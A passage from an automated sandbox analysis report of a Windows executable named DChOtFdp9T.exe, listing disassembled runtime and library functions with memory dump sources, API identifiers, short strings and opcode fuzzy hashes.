                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                            • Instruction ID: 798705331805ee65fd2c8f0b899eebd1597bd171f5ab408d361a278192b6ad9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87111836B18F058AEB048B60E8647A833A4FB19758F841E31DE6D467A8EF78D5948380
                                                                                                                                                                                                                            Function 00007FF6029B499C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                            • Opcode ID: cb146d52e44fda47aec41e3b327be8b66e5931a88c42cb1600bd2f9a4b903df4
                                                                                                                                                                                                                            • Instruction ID: 947e59aa0ff00b7d31ccd7d94a876109dd5e4c5513df529f885daefdeeb058f9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb146d52e44fda47aec41e3b327be8b66e5931a88c42cb1600bd2f9a4b903df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D41F712A0838241FB669B27961137A5E90EF81BA8F345235EE5C87AD7DFBCD441D700
                                                                                                                                                                                                                            Function 00007FF6029A7E94 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A7EC6
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF60299BC15), ref: 00007FF6029A7EE4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                            • API String ID: 3580290477-4277806258
                                                                                                                                                                                                                            • Opcode ID: dc876d716bcbc962327dfecb76c3da50076091fbe61dc3bbb62dbd28c163c069
                                                                                                                                                                                                                            • Instruction ID: e302487437b13d2d169ae98e836b5336f8775044e293c54a5e2d5054ca72df63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc876d716bcbc962327dfecb76c3da50076091fbe61dc3bbb62dbd28c163c069
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20419D36E08B1295EB55DF63A4410FC6BA4FF45B98B754035EA0E87B87DEBCE5818380
                                                                                                                                                                                                                            Function 00007FF6029AF35C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                            • Opcode ID: 2f043e4c71c20d88896d15289d2095323445f99b8f170c67af765481113726d7
                                                                                                                                                                                                                            • Instruction ID: 6d6cea6df54d7a62a9c2cb80a9e413063e66e52ea0790ee102d1ac94d420378d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f043e4c71c20d88896d15289d2095323445f99b8f170c67af765481113726d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD413A22F18B5288FB119BB2D8511BC3EB46F5479CF640035DE0DA7E86EFBDA4468394
                                                                                                                                                                                                                            Function 00007FF6029ABAB8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                            • Opcode ID: edf8a3e1b0c94e4cd4a87b59cb25ff96c40068475c65d4e51d5884f36b3b6636
                                                                                                                                                                                                                            • Instruction ID: c4f6d1bb6b342c91491d016525a2ce22b6917faecb06cf5c6fe46b806fca8785
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edf8a3e1b0c94e4cd4a87b59cb25ff96c40068475c65d4e51d5884f36b3b6636
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41B222B19B8186DB20CF26E4553A96BA0FF98B98F604035EE4DC7799DF7CD441C740
                                                                                                                                                                                                                            Function 00007FFE0CFE2AF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                                            • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                                            • API String ID: 3234217646-2495715787
                                                                                                                                                                                                                            • Opcode ID: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                            • Instruction ID: 07d2fd5b2a4663238ae33149dd383316dd07cd2b7d71529273161ed6e1d05840
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E021442394D3C14BD7034F75949909C7FA0EF96B50B99C1BAC38483716EA9C99CBC711
                                                                                                                                                                                                                            Function 00007FF6029AE438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: fd671bd2fd5218516e653d4e6dbf8a613ca8f5cbf383185d7d42014db33af942
                                                                                                                                                                                                                            • Instruction ID: 705a91dfcbe9fcdf46b89280abd40ad315a33f1b21cb9da116a45739f56c91ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd671bd2fd5218516e653d4e6dbf8a613ca8f5cbf383185d7d42014db33af942
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2821D032E0838182EB209B16E04426D77E5FF88B8CF654035DA8D83686DFBCE945C791
                                                                                                                                                                                                                            Function 00007FFDFF27CF4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (0x%04x)
                                                                                                                                                                                                                            • API String ID: 2723189173-3351362759
                                                                                                                                                                                                                            • Opcode ID: 533420b7bada7848348840fd67616d21adac2f845cfff8de302899fab3b0c9cc
                                                                                                                                                                                                                            • Instruction ID: 9c4b0bb72734b4a1645806896382776fbfd963e6aa6ca7636a6d9b223e225d66
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 533420b7bada7848348840fd67616d21adac2f845cfff8de302899fab3b0c9cc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63119623B0D59246EB148A16F135ABD6751EB41790F944232CEBEC3AD9EE2DF152C704
                                                                                                                                                                                                                            Function 00007FFDFF27CE0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 2723189173-2206749211
                                                                                                                                                                                                                            • Opcode ID: 805d2e53cfd7709015aea11038eb697881fba96565e0fdb4071b72a2519350e7
                                                                                                                                                                                                                            • Instruction ID: 21acdf2f1ed150dce7f878c31b10e947c831224885e3f7f2f93fa94aa5e3c20e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 805d2e53cfd7709015aea11038eb697881fba96565e0fdb4071b72a2519350e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76110823F0C69246EB518A26B525A7A2B929B45BE0F454232CEFDD77C9ED3CE041C340
                                                                                                                                                                                                                            Function 00007FFDFF27CD7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_dump_indentO_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 2723189173-2206749211
                                                                                                                                                                                                                            • Opcode ID: 6e54556c157042b7d04aed057dbc6c54d1cf6f53d7ddc600a4537625481a468f
                                                                                                                                                                                                                            • Instruction ID: 88eb7eb49bbdaa49667939ebcdd76d35e9a4552399fe1ed45e54b9fc7cadc296
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e54556c157042b7d04aed057dbc6c54d1cf6f53d7ddc600a4537625481a468f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2118633B0C69686EB548A16F0349B96B51AB45B90F848232CEBEC77D9DE3DF142C704
                                                                                                                                                                                                                            Function 00007FF60299EDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction ID: 3673b7a82775ae432b3f80559ef6666884ac70d95840435f2e1f94460cc91143
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B111932A18B8182EB61CF1AE5402697BE5FF88B98F684231DACD47765DF7CD5618B00
                                                                                                                                                                                                                            Function 00007FFDFF27CCFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: %s (%d)
                                                                                                                                                                                                                            • API String ID: 1860387303-2206749211
                                                                                                                                                                                                                            • Opcode ID: 84165c5a742860087a4181324a4083d95e8c5db66e94e6bdcefa2ca088d4fd60
                                                                                                                                                                                                                            • Instruction ID: 5ece05ca511cc7390598d601c71183a3099078f0fbedeac2c69f928e92467560
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84165c5a742860087a4181324a4083d95e8c5db66e94e6bdcefa2ca088d4fd60
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7018437B0C65686DB148B15B024AB96B50F786B90F958231CEBEC77D9DE3CE1428744
                                                                                                                                                                                                                            Function 00007FF6029AF4C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                            • Opcode ID: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction ID: 636880391f91f74f2499da15704166a7e936f03cf19eb8fe73e3cbdd05199b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9018F61E1830286FB70AF62A46127E2BA0FF54B0CFB01135D64DC6A86DFADE504CB54
                                                                                                                                                                                                                            Function 00007FFDFF254D6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
